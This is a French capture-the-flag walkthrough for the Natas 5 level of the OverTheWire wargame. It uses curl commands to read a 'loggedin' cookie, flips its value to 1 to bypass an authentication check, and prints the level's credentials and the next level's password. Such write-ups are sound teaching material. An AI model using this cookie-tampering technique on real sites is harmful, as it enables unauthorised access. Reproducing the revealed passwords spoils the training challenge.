Natas 5

Level Goal

Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
URL: http://natas5.natas.labs.overthewire.org

De manière a rendre les choses un peu plus intéressantes on utilisera dorénavant systématiquement curl pour se connecter aux épreuves.

Commençons par nous connecter à la page du challenge :

curl http://natas5.natas.labs.overthewire.org -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

On a le message d'erreur :

Access disallowed. You are not logged in

Il semblerait que le site s'attende à ce que l'on soit connecté. Il y a (principalement) deux manières pour un site de nous identifier :

• les cookies, qui sont stockés côté client
• les sessions, gérées par le serveur

Affichons les cookies envoyés par le serveur avec la commande :

curl --cookie-jar - http://natas5.natas.labs.overthewire.org -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

On obtient :

natas5.natas.labs.overthewire.org   FALSE   /   FALSE   0   loggedin    0

Essayons d'envoyer le cookie loggedin reçu avec la valeur 1 au lieu de la valeur 0 :

curl http://natas5.natas.labs.overthewire.org -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq --cookie "loggedin=1"

On obtient le message suivant :

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1